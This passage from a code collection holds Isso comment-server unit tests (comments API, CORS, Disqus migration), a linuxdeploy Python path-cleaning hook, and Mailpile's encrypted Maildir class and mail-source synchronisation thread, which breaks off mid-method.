self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
self.put('/id/1', data=json.dumps({
'text': 'Hello World', 'author': 'me', 'website': 'http://example.com/'}))
r = self.get('/id/1?plain=1')
assert r.status_code == 200
rv = loads(r.data)
assert rv['text'] == 'Hello World'
assert rv['author'] == 'me'
assert rv['website'] == 'http://example.com/'
assert 'modified' in rv
def testDelete(self):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Lorem ipsum ...'}))
r = self.delete('/id/1')
assert r.status_code == 200
assert loads(r.data) == None
assert self.get('/id/1').status_code == 404
def testDeleteWithReference(self):
client = JSONClient(self.app, Response)
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'First'}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'First', 'parent': 1}))
r = client.delete('/id/1')
assert r.status_code == 200
assert loads(r.data)['mode'] == 4
assert '/path/' in self.app.db.threads
assert self.get('/?uri=%2Fpath%2F&id=1').status_code == 200
assert self.get('/?uri=%2Fpath%2F&id=2').status_code == 200
r = client.delete('/id/2')
assert self.get('/?uri=%2Fpath%2F').status_code == 404
assert '/path/' not in self.app.db.threads
def testDeleteWithMultipleReferences(self):
"""
[ comment 1 ]
|
--- [ comment 2, ref 1 ]
|
--- [ comment 3, ref 2 ]
|
--- [ comment 4, ref 2 ]
[ comment 5 ]
"""
client = JSONClient(self.app, Response)
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'First'}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Second', 'parent': 1}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Third 1', 'parent': 2}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Third 2', 'parent': 2}))
client.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': '...'}))
client.delete('/id/1')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/2')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/3')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/4')
assert self.get('/?uri=%2Fpath%2F').status_code == 200
client.delete('/id/5')
assert self.get('/?uri=%2Fpath%2F').status_code == 404
def testPathVariations(self):
paths = ['/sub/path/', '/path.html', '/sub/path.html', 'path', '/']
for path in paths:
assert self.post('/new?' + urlencode({'uri': path}),
data=json.dumps({'text': '...'})).status_code == 201
for i, path in enumerate(paths):
assert self.get('/?' + urlencode({'uri': path})).status_code == 200
assert self.get('/id/%i' % (i + 1)).status_code == 200
def testDeleteAndCreateByDifferentUsersButSamePostId(self):
mallory = JSONClient(self.app, Response)
mallory.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Foo'}))
mallory.delete('/id/1')
bob = JSONClient(self.app, Response)
bob.post('/new?uri=%2Fpath%2F', data=json.dumps({'text': 'Bar'}))
assert mallory.delete('/id/1').status_code == 403
assert bob.delete('/id/1').status_code == 200
def testHash(self):
a = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "Aaa"}))
b = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "Bbb"}))
c = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "Ccc", "email": "..."}))
assert a.status_code == b.status_code == c.status_code == 201
a = loads(a.data)
b = loads(b.data)
c = loads(c.data)
assert isinstance(int(a['hash'], 16), int)
assert a['hash'] != '192.168.1.1'
assert a['hash'] == b['hash']
assert a['hash'] != c['hash']
def testVisibleFields(self):
rv = self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "..."}))
assert rv.status_code == 201
rv = loads(rv.data)
for key in comments.API.FIELDS:
rv.pop(key)
assert not any(rv.keys())
def testCounts(self):
assert self.get('/count?uri=%2Fpath%2F').status_code == 404
self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "..."}))
rv = self.get('/count?uri=%2Fpath%2F')
assert rv.status_code == 200
assert loads(rv.data) == 1
for x in range(3):
self.post('/new?uri=%2Fpath%2F', data=json.dumps({"text": "..."}))
rv = self.get('/count?uri=%2Fpath%2F')
assert rv.status_code == 200
assert loads(rv.data) == 4
for x in range(4):
self.delete('/id/%i' % (x + 1))
rv = self.get('/count?uri=%2Fpath%2F')
assert rv.status_code == 404
def testModify(self):
self.post('/new?uri=test', data=json.dumps({"text": "Tpyo"}))
self.put('/id/1', data=json.dumps({"text": "Tyop"}))
assert loads(self.get('/id/1').data)["text"] == "<p>Tyop</p>"
self.put('/id/1', data=json.dumps({"text": "Typo"}))
assert loads(self.get('/id/1').data)["text"] == "<p>Typo</p>"
def testDeleteCommentRemovesThread(self):
rv = self.client.post('/new?uri=%2F', data=json.dumps({"text": "..."}))
assert '/' in self.app.db.threads
self.client.delete('/id/1')
assert '/' not in self.app.db.threads
def testCSRF(self):
js = "application/json"
form = "application/x-www-form-urlencoded"
self.post('/new?uri=%2F', data=json.dumps({"text": "..."}))
# no header is fine (default for XHR)
assert self.post('/id/1/dislike', content_type="").status_code == 200
# x-www-form-urlencoded is definitely not RESTful
assert self.post('/id/1/dislike', content_type=form).status_code == 403
assert self.post('/new?uri=%2F', data=json.dumps({"text": "..."}),
content_type=form).status_code == 403
# just for the record
assert self.post('/id/1/dislike', content_type=js).status_code == 200
def testCheckIP(self):
assert self.get('/check-ip').data.decode("utf-8") == '192.168.1.0'
class TestModeratedComments(unittest.TestCase):
def setUp(self):
fd, self.path = tempfile.mkstemp()
conf = core.Config.load(None)
conf.set("general", "dbpath", self.path)
conf.set("moderation", "enabled", "true")
conf.set("guard", "enabled", "off")
class App(Isso, core.Mixin):
pass
self.app = App(conf)
self.app.wsgi_app = FakeIP(self.app.wsgi_app, "192.168.1.1")
self.client = JSONClient(self.app, Response)
def tearDown(self):
os.unlink(self.path)
def testAddComment(self):
rv = self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
assert rv.status_code == 202
assert self.client.get('/id/1').status_code == 200
assert self.client.get('/?uri=test').status_code == 404
self.app.db.comments.activate(1)
assert self.client.get('/?uri=test').status_code == 200
class TestPurgeComments(unittest.TestCase):
def setUp(self):
fd, self.path = tempfile.mkstemp()
conf = core.Config.load(None)
conf.set("general", "dbpath", self.path)
conf.set("moderation", "enabled", "true")
conf.set("guard", "enabled", "off")
class App(Isso, core.Mixin):
pass
self.app = App(conf)
self.app.wsgi_app = FakeIP(self.app.wsgi_app, "192.168.1.1")
self.client = JSONClient(self.app, Response)
def testPurgeDoesNoHarm(self):
self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
self.app.db.comments.activate(1)
self.app.db.comments.purge(0)
assert self.client.get('/?uri=test').status_code == 200
def testPurgeWorks(self):
self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
self.app.db.comments.purge(0)
assert self.client.get('/id/1').status_code == 404
self.client.post('/new?uri=test', data=json.dumps({"text": "..."}))
self.app.db.comments.purge(3600)
assert self.client.get('/id/1').status_code == 200
```
#### File: isso/specs/test_cors.py
```python
from __future__ import unicode_literals
from werkzeug.test import Client
from werkzeug.wrappers import Response
from isso.wsgi import CORSMiddleware
from isso.utils import origin
def hello_world(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/html')])
return ["Hello, World."]
def test_simple_CORS():
app = CORSMiddleware(hello_world, origin=origin([
"https://example.tld/",
"http://example.tld/",
"http://example.tld",
]))
client = Client(app, Response)
rv = client.get("/", headers={"ORIGIN": "https://example.tld"})
assert rv.headers["Access-Control-Allow-Origin"] == "https://example.tld"
assert rv.headers["Access-Control-Allow-Headers"] == "Origin, Content-Type"
assert rv.headers["Access-Control-Allow-Credentials"] == "true"
assert rv.headers["Access-Control-Allow-Methods"] == "GET, POST, PUT, DELETE"
assert rv.headers["Access-Control-Expose-Headers"] == "X-Set-Cookie"
a = client.get("/", headers={"ORIGIN": "http://example.tld"})
assert a.headers["Access-Control-Allow-Origin"] == "http://example.tld"
b = client.get("/", headers={"ORIGIN": "http://example.tld"})
assert b.headers["Access-Control-Allow-Origin"] == "http://example.tld"
c = client.get("/", headers={"ORIGIN": "http://foo.other"})
assert c.headers["Access-Control-Allow-Origin"] == "https://example.tld"
def test_preflight_CORS():
app = CORSMiddleware(hello_world, origin=origin(["http://example.tld"]))
client = Client(app, Response)
rv = client.open(method="OPTIONS", path="/", headers={"ORIGIN": "http://example.tld"})
assert rv.status_code == 200
for hdr in ("Origin", "Headers", "Credentials", "Methods"):
assert "Access-Control-Allow-%s" % hdr in rv.headers
assert rv.headers["Access-Control-Allow-Origin"] == "http://example.tld"
```
#### File: isso/specs/test_migration.py
```python
import tempfile
from os.path import join, dirname
from isso.core import Config
from isso.db import SQLite3
from isso.migrate import disqus
def test_disqus():
xml = join(dirname(__file__), "disqus.xml")
xxx = tempfile.NamedTemporaryFile()
db = SQLite3(xxx.name, Config.load(None))
disqus(db, xml)
assert db.threads["/"]["title"] == "Hello, World!"
assert db.threads["/"]["id"] == 1
a = db.comments.get(1)
assert a["author"] == "peter"
assert a["email"] == "<EMAIL>"
b = db.comments.get(2)
assert b["parent"] == a["id"]
``` |
{
"source": "JocelynDelalande/linuxdeploy-plugin-python",
"score": 3
} |
#### File: linuxdeploy-plugin-python/share/sitecustomize.py
```python
import os
import sys
def clean_path():
site_packages = "/usr/local/lib/python{:}.{:}/site-packages".format(
*sys.version_info[:2])
binaries_path = "/usr/local/bin"
env_path = os.getenv("PYTHONPATH")
if env_path is None:
env_path = []
else:
env_path = [os.path.realpath(path) for path in env_path.split(":")]
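    # Only strip the bundled site-packages when we are not running the
    # bundled interpreter and the user has not put that directory on
    # PYTHONPATH explicitly.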
if ((os.path.dirname(sys.executable) != binaries_path) and
(site_packages not in env_path)):
# Remove the builtin site-packages from the path
try:
sys.path.remove(site_packages)
except ValueError:
pass
clean_path()
``` |
{
"source": "JocelynDelalande/Mailpile",
"score": 2
} |
#### File: mailpile/mailboxes/wervd.py
```python
import email.generator
import email.message
import mailbox
import os
import StringIO
import sys
import mailpile.mailboxes
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import UnorderedPicklable
from mailpile.crypto.streamer import *
from mailpile.util import safe_remove
class MailpileMailbox(UnorderedPicklable(mailbox.Maildir, editable=True)):
"""A Maildir class that supports pickling and a few mailpile specifics."""
supported_platform = None
@classmethod
def parse_path(cls, config, fn, create=False):
if (((cls.supported_platform is None) or
(cls.supported_platform == sys.platform[:3].lower())) and
((os.path.isdir(fn) and
os.path.exists(os.path.join(fn, 'cur')) and
os.path.exists(os.path.join(fn, 'wervd.ver'))) or
(create and not os.path.exists(fn)))):
return (fn, )
raise ValueError('Not a Maildir: %s' % fn)
def __init2__(self, *args, **kwargs):
open(os.path.join(self._path, 'wervd.ver'), 'w+b').write('0')
def remove(self, key):
# FIXME: Remove all the copies of this message!
fn = self._lookup(key)
del self._toc[key]
safe_remove(fn)
def _refresh(self):
mailbox.Maildir._refresh(self)
# WERVD mail names don't have dots in them
for t in [k for k in self._toc.keys() if '.' in k]:
del self._toc[t]
safe_remove() # Try to remove any postponed removals
def _get_fd(self, key):
fd = open(os.path.join(self._path, self._lookup(key)), 'rb')
key = self._decryption_key_func()
if key:
fd = DecryptingStreamer(fd, mep_key=key, name='WERVD')
return fd
def get_message(self, key):
"""Return a Message representation or raise a KeyError."""
with self._get_fd(key) as fd:
if self._factory:
return self._factory(fd)
else:
return mailbox.MaildirMessage(fd)
def get_string(self, key):
with self._get_fd(key) as fd:
return fd.read()
def get_file(self, key):
return StringIO.StringIO(self.get_string(key))
def add(self, message, copies=1):
"""Add message and return assigned key."""
key = self._encryption_key_func()
es = None
try:
tmpdir = os.path.join(self._path, 'tmp')
if key:
es = EncryptingStreamer(key,
dir=tmpdir, name='WERVD',
delimited=False)
else:
es = ChecksummingStreamer(dir=tmpdir, name='WERVD')
self._dump_message(message, es)
es.finish()
# We are using the MD5 to detect file system corruption, not in a
# security context - so using as little as 40 bits should be fine.
saved = False
key = None
for l in range(10, len(es.outer_md5sum)):
key = es.outer_md5sum[:l]
fn = os.path.join(self._path, 'new', key)
if not os.path.exists(fn):
es.save(fn)
saved = self._toc[key] = os.path.join('new', key)
break
if not saved:
raise mailbox.ExternalClashError(_('Could not find a filename '
'for the message.'))
for cpn in range(1, copies):
fn = os.path.join(self._path, 'new', '%s.%s' % (key, cpn))
with mailbox._create_carefully(fn) as ofd:
es.save_copy(ofd)
return key
finally:
if es is not None:
es.close()
def _dump_message(self, message, target):
if isinstance(message, email.message.Message):
gen = email.generator.Generator(target, False, 0)
gen.flatten(message)
elif isinstance(message, str):
target.write(message)
else:
raise TypeError(_('Invalid message type: %s') % type(message))
def __setitem__(self, key, message):
raise IOError(_('Mailbox messages are immutable'))
mailpile.mailboxes.register(15, MailpileMailbox)
```
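The `add()` method above derives each message's filename from a prefix of the encrypted stream's MD5 sum, lengthening the prefix until it no longer collides with an existing file (the digest guards against file-system corruption, not attackers). A minimal standalone sketch of that strategy follows; `pick_unique_name` is a hypothetical helper, not part of Mailpile.
```python
# Sketch only: the "grow the hash prefix until unique" idea from
# MailpileMailbox.add(). `pick_unique_name` is a hypothetical helper.
import os

def pick_unique_name(digest, directory, min_len=10):
    """Return the shortest prefix of digest (at least min_len characters)
    that does not collide with an existing file in directory."""
    for length in range(min_len, len(digest) + 1):
        candidate = digest[:length]
        if not os.path.exists(os.path.join(directory, candidate)):
            return candidate
    return None  # every prefix collided; the caller treats this as an error
```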
#### File: mailpile/mail_source/__init__.py
```python
import os
import random
import re
import thread
import threading
import traceback
import time
import mailpile.util
from mailpile.eventlog import Event
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import *
from mailpile.mailutils import FormatMbxId
from mailpile.util import *
__all__ = ['mbox', 'maildir', 'imap']
GLOBAL_RESCAN_LOCK = MSrcLock()
class BaseMailSource(threading.Thread):
"""
MailSources take care of managing a group of mailboxes, synchronizing
the source with Mailpile's local metadata and/or caches.
"""
DEFAULT_JITTER = 15 # Fudge factor to tame thundering herds
SAVE_STATE_INTERVAL = 3600 # How frequently we pickle our state
INTERNAL_ERROR_SLEEP = 900 # Pause time on error, in seconds
RESCAN_BATCH_SIZE = 100 # Index at most this many new e-mails at once
MAX_MAILBOXES = 100 # Max number of mailboxes we add
MAX_PATHS = 5000 # Abort if asked to scan too many directories
# This is a helper for the events.
__classname__ = 'mailpile.mail_source.BaseMailSource'
def __init__(self, session, my_config):
threading.Thread.__init__(self)
self.daemon = mailpile.util.TESTING
self._lock = MSrcRLock()
self.my_config = my_config
self.name = my_config.name
self.session = session
self.alive = None
self.event = None
self.jitter = self.DEFAULT_JITTER
self._state = 'Idle'
self._sleeping = None
self._interrupt = None
self._rescanning = False
self._rescan_waiters = []
self._loop_count = 0
self._last_rescan_count = 0
self._last_rescan_completed = False
self._last_rescan_failed = False
self._last_saved = time.time() # Saving right away would be silly
def __str__(self):
rv = ': '.join([threading.Thread.__str__(self), self._state])
if self._sleeping > 0:
rv += '(%s)' % self._sleeping
return rv
def _pfn(self):
return 'mail-source.%s' % self.my_config._key
def _load_state(self):
with self._lock:
config, my_config = self.session.config, self.my_config
events = list(config.event_log.incomplete(source=self,
data_id=my_config._key))
if events:
self.event = events[0]
else:
self.event = config.event_log.log(
source=self,
flags=Event.RUNNING,
message=_('Starting up'),
data={'id': my_config._key})
if 'counters' not in self.event.data:
self.event.data['counters'] = {}
for c in ('copied_messages',
'indexed_messages',
'unknown_policies'):
if c not in self.event.data['counters']:
self.event.data['counters'][c] = 0
def _save_state(self):
self.session.config.event_log.log_event(self.event)
def _save_config(self):
self.session.config.save_worker.add_unique_task(
self.session, 'Save config', self.session.config.save)
def _log_status(self, message):
self.event.message = message
self.session.config.event_log.log_event(self.event)
self.session.ui.mark(message)
if 'sources' in self.session.config.sys.debug:
self.session.ui.debug('%s: %s' % (self, message))
def open(self):
"""Open mailboxes or connect to the remote mail source."""
        raise NotImplementedError('Please override open in %s' % self)
def close(self):
"""Close mailboxes or disconnect from the remote mail source."""
        raise NotImplementedError('Please override close in %s' % self)
def _has_mailbox_changed(self, mbx, state):
"""For the default sync_mail routine, report if mailbox changed."""
        raise NotImplementedError('Please override _has_mailbox_changed in %s'
                                  % self)
def _mark_mailbox_rescanned(self, mbx, state):
"""For the default sync_mail routine, note mailbox was rescanned."""
        raise NotImplementedError('Please override _mark_mailbox_rescanned in %s'
                                  % self)
def _path(self, mbx):
if mbx.path.startswith('@'):
return self.session.config.sys.mailbox[mbx.path[1:]]
else:
return mbx.path
def _check_interrupt(self, clear=True):
if mailpile.util.QUITTING or self._interrupt:
if clear:
self._log_status(_('Interrupted: %s')
% (self._interrupt or _('Quitting')))
self._interrupt = None
return True
else:
return False
def _sorted_mailboxes(self):
mailboxes = self.my_config.mailbox.values()
mailboxes.sort(key=lambda m: ('inbox' in m.name.lower() and 1 or 2,
'sent' in m.name.lower() and 1 or 2,
m.name))
return mailboxes
def sync_mail(self):
"""Iterates through all the mailboxes and scans if necessary."""
config = self.session.config
self._last_rescan_count = rescanned = errors = 0
self._last_rescan_completed = True
self._last_rescan_failed = False
self._interrupt = None
batch = self.RESCAN_BATCH_SIZE
errors = rescanned = 0
ostate = self._state
for mbx_cfg in self._sorted_mailboxes():
try:
with self._lock:
mbx_key = FormatMbxId(mbx_cfg._key)
path = self._path(mbx_cfg)
if (path in ('/dev/null', '', None)
or mbx_cfg.policy in ('ignore', 'unknown')):
continue
# Generally speaking, we only rescan if a mailbox looks like
# it has changed. However, 1/50th of the time we take a look
# anyway just in case looks are deceiving.
state = {}
if batch > 0 and (self._has_mailbox_changed(mbx_cfg, state) or
random.randint(0, 50) == 10):
self._state = 'Waiting... (rescan)'
with GLOBAL_RESCAN_LOCK:
if self._check_interrupt(clear=False):
self._last_rescan_completed = False
break
count = self.rescan_mailbox(mbx_key, mbx_cfg, path,
stop_after=batch)
if count >= 0:
self.event.data['counters']['indexed_messages'] += count
batch -= count
complete = ((count == 0 or batch > 0) and
not self._interrupt and
not mailpile.util.QUITTING)
if complete:
rescanned += 1
# If there was a copy, check if it completed
if not self.event.data.get('copying',
{'complete': True}
).get('complete'):
complete = False
# If there was a rescan, check if it completed
if not self.event.data.get('rescan',
{'complete': True}
).get('complete'):
complete = False
# OK, everything looks complete, mark it!
if complete:
self._mark_mailbox_rescanned(mbx_cfg, state)
else:
self._last_rescan_completed = False
else:
self._last_rescan_failed = True
self._last_rescan_completed = False
errors += 1
except (NoSuchMailboxError, IOError, OSError):
self._last_rescan_failed = True
errors += 1
except:
self._last_rescan_failed = True
self._log_status(_('Internal error'))
raise
self._state = 'Waiting... (disco)'
discovered = 0
with GLOBAL_RESCAN_LOCK:
if not self._check_interrupt():
discovered = self.discover_mailboxes()
status = []
if discovered > 0:
status.append(_('Discovered %d mailboxes') % discovered)
if discovered < 1 or rescanned > 0:
status.append(_('Rescanned %d mailboxes') % rescanned)
if errors:
status.append(_('Failed to rescan %d') % errors)
self._log_status(', '.join(status))
self._last_rescan_count = rescanned
self._state = ostate
return rescanned
def _jitter(self, seconds):
return seconds + random.randint(0, self.jitter)
def _sleep(self, seconds):
if self._sleeping != 0:
self._sleeping = seconds
while (self.alive and self._sleeping > 0 and
not mailpile.util.QUITTING):
time.sleep(min(1, self._sleeping))
self._sleeping -= 1
self._sleeping = None
play_nice_with_threads()
return (self.alive and not mailpile.util.QUITTING)
def _existing_mailboxes(self):
return set(self.session.config.sys.mailbox +
[mbx_cfg.local
for mbx_cfg in self.my_config.mailbox.values()
if mbx_cfg.local])
def _update_unknown_state(self):
have_unknown = 0
for mailbox in self.my_config.mailbox.values():
if mailbox.policy == 'unknown':
have_unknown += 1
self.event.data['counters']['unknown_policies'] = have_unknown
self.event.data['have_unknown'] = (have_unknown > 0)
def discover_mailboxes(self, paths=None):
config = self.session.config
self._log_status(_('Checking for new mailboxes'))
ostate, self._state = self._state, 'Discovery'
try:
existing = self._existing_mailboxes()
max_mailboxes = self.MAX_MAILBOXES - len(existing)
adding = []
paths = (paths or self.my_config.discovery.paths)[:]
while paths:
raw_fn = paths.pop(0)
fn = os.path.normpath(os.path.expanduser(raw_fn))
fn = os.path.abspath(fn)
if not os.path.exists(fn):
continue
if (raw_fn not in existing and
fn not in existing and
fn not in adding):
if self.is_mailbox(fn):
adding.append(fn)
if len(adding) > max_mailboxes:
break
if os.path.isdir(fn):
try:
for f in [f for f in os.listdir(fn)
if f not in ('.', '..')]:
nfn = os.path.join(fn, f)
if (len(paths) <= self.MAX_PATHS and
os.path.isdir(nfn)):
paths.append(nfn)
elif self.is_mailbox(nfn):
paths.append(nfn)
except OSError:
pass
if len(adding) > max_mailboxes:
break
new = {}
for path in adding:
new[config.sys.mailbox.append(path)] = path
for mailbox_idx in new.keys():
mbx_cfg = self.take_over_mailbox(mailbox_idx, save=False)
if mbx_cfg.policy != 'unknown':
del new[mailbox_idx]
if adding:
self._save_config()
return len(adding)
finally:
self._state = ostate
def take_over_mailbox(self, mailbox_idx, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery # Stayin' alive! Stayin' alive!
with self._lock:
mailbox_idx = FormatMbxId(mailbox_idx)
self.my_config.mailbox[mailbox_idx] = {
'path': '@%s' % mailbox_idx,
'policy': disco_cfg.policy,
'process_new': disco_cfg.process_new,
}
mbx_cfg = self.my_config.mailbox[mailbox_idx]
mbx_cfg.apply_tags.extend(disco_cfg.apply_tags)
mbx_cfg.name = self._mailbox_name(self._path(mbx_cfg))
if disco_cfg.guess_tags:
self._guess_tags(mbx_cfg)
self._create_primary_tag(mbx_cfg, save=False)
self._create_local_mailbox(mbx_cfg, save=False)
if save:
self._save_config()
return mbx_cfg
def _guess_tags(self, mbx_cfg):
if not mbx_cfg.name:
return
name = mbx_cfg.name.lower()
tags = set(mbx_cfg.apply_tags)
for tagtype in ('inbox', 'drafts', 'sent', 'spam'):
for tag in self.session.config.get_tags(type=tagtype):
if (tag.name.lower() in name or
_(tag.name).lower() in name):
tags.add(tag._key)
mbx_cfg.apply_tags = sorted(list(tags))
def _mailbox_name(self, path):
return path.split('/')[-1]
def _create_local_mailbox(self, mbx_cfg, save=True):
config = self.session.config
disco_cfg = self.my_config.discovery
if mbx_cfg.local and mbx_cfg.local != '!CREATE':
if not os.path.exists(mbx_cfg.local):
path, wervd = config.create_local_mailstore(self.session,
name=mbx_cfg.local)
mbx_cfg.local = path
if save:
self._save_config()
elif mbx_cfg.local == '!CREATE' or disco_cfg.local_copy:
path, wervd = config.create_local_mailstore(self.session)
mbx_cfg.local = path
if save:
self._save_config()
return mbx_cfg
def _create_parent_tag(self, save=True):
disco_cfg = self.my_config.discovery
if disco_cfg.parent_tag:
if disco_cfg.parent_tag == '!CREATE':
name = (self.my_config.name or
(self.my_config.username or '').split('@')[-1] or
(disco_cfg.paths and
os.path.basename(disco_cfg.paths[0])) or
self.my_config._key)
if len(name) < 4:
name = _('Mail: %s') % name
disco_cfg.parent_tag = name
disco_cfg.parent_tag = self._create_tag(disco_cfg.parent_tag,
use_existing=False,
unique=False)
return disco_cfg.parent_tag
else:
return None
def _create_primary_tag(self, mbx_cfg, save=True):
config = self.session.config
if mbx_cfg.primary_tag and (mbx_cfg.primary_tag in config.tags):
return
# Stayin' alive! Stayin' alive!
disco_cfg = self.my_config.discovery
if not disco_cfg.create_tag:
return
# We configure the primary_tag with a name, if it doesn't have
# one already.
if not mbx_cfg.primary_tag:
mbx_cfg.primary_tag = self._create_tag_name(self._path(mbx_cfg))
# If we have a policy for this mailbox, we really go and create
# tags. The gap here allows the user to edit the primary_tag
# proposal before changing the policy from 'unknown'.
if mbx_cfg.policy != 'unknown':
parent = self._create_parent_tag(save=save)
try:
mbx_cfg.primary_tag = self._create_tag(mbx_cfg.primary_tag,
use_existing=False,
unique=False,
parent=parent)
if save:
self._save_config()
except (ValueError, IndexError):
self.session.ui.debug(traceback.format_exc())
BORING_FOLDER_RE = re.compile('(?i)^(home|mail|data|user\S*|[^a-z]+)$')
def _path_to_tagname(self, path): # -> tag name
"""This converts a path to a tag name."""
path = path.replace('/.', '/')
parts = ('/' in path) and path.split('/') or path.split('\\')
parts = [p for p in parts if not re.match(self.BORING_FOLDER_RE, p)]
tagname = parts.pop(-1).split('.')[0]
# if self.my_config.name:
# tagname = '%s/%s' % (self.my_config.name, tagname)
return CleanText(tagname.replace('_', ' '),
banned=CleanText.NONALNUM + '{}[]').clean
def _unique_tag_name(self, tagname): # -> unused tag name
"""This makes sure a tagname really is unused"""
tagnameN, count = tagname, 2
while self.session.config.get_tags(tagnameN):
tagnameN = '%s (%s)' % (tagname, count)
count += 1
return tagnameN
def _create_tag_name(self, path): # -> unique tag name
"""Convert a path to a unique tag name."""
return self._unique_tag_name(self._path_to_tagname(path))
def _create_tag(self, tag_name_or_id,
use_existing=True,
unique=False, parent=None): # -> tag ID
if tag_name_or_id in self.session.config.tags:
# Short circuit if this is a tag ID for an existing tag
return tag_name_or_id
else:
tag_name = tag_name_or_id
tags = self.session.config.get_tags(tag_name)
if tags and unique:
raise ValueError('Tag name is not unique!')
elif len(tags) == 1 and use_existing:
tag_id = tags[0]._key
elif len(tags) > 1:
raise ValueError('Tag name matches multiple tags!')
else:
from mailpile.plugins.tags import AddTag, Slugify
bogus_name = 'New-Tag-%s' % len(str(self.session.config))
AddTag(self.session, arg=[bogus_name]).run(save=False)
tags = self.session.config.get_tags(bogus_name)
if tags:
tags[0].slug = Slugify(tag_name, self.session.config.tags)
tags[0].name = tag_name
if parent:
tags[0].parent = parent
tag_id = tags[0]._key
else:
raise ValueError('Failed to create tag?')
return tag_id
def interrupt_rescan(self, reason):
self._interrupt = reason or _('Aborted')
if self._rescanning:
self.session.config.index.interrupt = reason
def _process_new(self, msg, msg_ts, keywords, snippet):
return ProcessNew(self.session, msg, msg_ts, keywords, snippet)
def _copy_new_messages(self, mbx_key, mbx_cfg, stop_after=-1):
session, config = self.session, self.session.config
self.event.data['copying'] = progress = {
'running': True,
'mailbox_id': mbx_key,
'copied_messages': 0,
'copied_bytes': 0,
'complete': False
}
try:
src = config.open_mailbox(session, mbx_key, prefer_local=False)
loc = config.open_mailbox(session, mbx_key, prefer_local=True)
if src == loc:
return
keys = list(src.iterkeys())
progress.update({
'total': len(keys),
'batch_size': stop_after if (stop_after > 0) else len(keys)
})
for key in keys:
if self._check_interrupt(clear=False):
return
play_nice_with_threads()
if key not in loc.source_map:
session.ui.mark(_('Copying message: %s') % key)
data = src.get_bytes(key)
loc.add_from_source(key, data)
self.event.data['counters']['copied_messages'] += 1
progress['copied_messages'] += 1
progress['copied_bytes'] += len(data)
stop_after -= 1
if stop_after == 0:
return
progress['complete'] = True
except IOError:
# These just abort the download/read, which we're going to just
# take in stride for now.
pass
finally:
progress['running'] = False
def rescan_mailbox(self, mbx_key, mbx_cfg, path, stop_after=None):
session, config = self.session, self.session.config
with self._lock:
if self._rescanning:
return -1
self._rescanning = True
mailboxes = len(self.my_config.mailbox)
try:
ostate, self._state = self._state, 'Rescan(%s, %s)' % (mbx_key,
stop_after)
if mbx_cfg.local or self.my_config.discovery.local_copy:
# Note: We copy fewer messages than the batch allows for,
# because we might have been aborted on an earlier run and
# the rescan may need to catch up. We also start with smaller
# batch sizes, because folks are impatient.
self._log_status(_('Copying mail: %s') % path)
self._create_local_mailbox(mbx_cfg)
max_copy = min(self._loop_count,
int(1 + stop_after / (mailboxes + 1)))
self._copy_new_messages(mbx_key, mbx_cfg, stop_after=max_copy)
with self._lock:
apply_tags = mbx_cfg.apply_tags[:]
self._create_primary_tag(mbx_cfg)
if mbx_cfg.primary_tag:
tid = config.get_tag_id(mbx_cfg.primary_tag)
if tid:
apply_tags.append(tid)
play_nice_with_threads()
self._log_status(_('Rescanning: %s') % path)
if 'rescans' in self.event.data:
self.event.data['rescans'][:-mailboxes] = []
return config.index.scan_mailbox(
session, mbx_key, mbx_cfg.local or path,
config.open_mailbox,
process_new=(mbx_cfg.process_new and
self._process_new or False),
apply_tags=(apply_tags or []),
stop_after=stop_after,
event=self.event)
except ValueError:
session.ui.debug(traceback.format_exc())
return -1
finally:
self._state = ostate
self._rescanning = False
def open_mailbox(self, mbx_id, fn):
# This allows mail sources to override the default mailbox
# opening mechanism. Returning false respectfully declines.
return False
def is_mailbox(self, fn):
return False
def run(self):
self.alive = True
self._load_state()
self.event.flags = Event.RUNNING
_original_session = self.session
def sleeptime():
if self._last_rescan_completed or self._last_rescan_failed:
return self.my_config.interval
else:
return 1
self._loop_count = 0
while self._loop_count == 0 or self._sleep(self._jitter(sleeptime())):
self._loop_count += 1
if not self.my_config.enabled:
break
self.name = self.my_config.name # In case the config changes
self._update_unknown_state()
if not self.session.config.index:
continue
waiters, self._rescan_waiters = self._rescan_waiters, []
for b, e, s in waiters:
try:
b.release()
except thread.error:
pass
if s:
self.session = s
try:
if 'traceback' in self.event.data:
del self.event.data['traceback']
if self.open():
self.sync_mail()
else:
self._log_conn_errors()
next_save_time = self._last_saved + self.SAVE_STATE_INTERVAL
if self.alive and time.time() >= next_save_time:
self._save_state()
if not self.my_config.keepalive:
self.close()
elif (self._last_rescan_completed and
not self.my_config.keepalive):
self.close()
except:
self.event.data['traceback'] = traceback.format_exc()
self.session.ui.debug(self.event.data['traceback'])
self._log_status(_('Internal error! Sleeping...'))
self._sleep(self.INTERNAL_ERROR_SLEEP)
finally:
for b, e, s in waiters:
try:
e.release()
except thread.error:
pass
self.session = _original_session
self._update_unknown_state()
self._save_state()
self.event.flags = Event.COMPLETE
self._log_status(_('Shut down'))
def _log_conn_errors(self):
if 'connection' in self.event.data:
cinfo = self.event.data['connection']
if not cinfo.get('live'):
err_msg = cinfo.get('error', [None, None])[1]
if err_msg:
self._log_status(err_msg)
def wake_up(self, after=0):
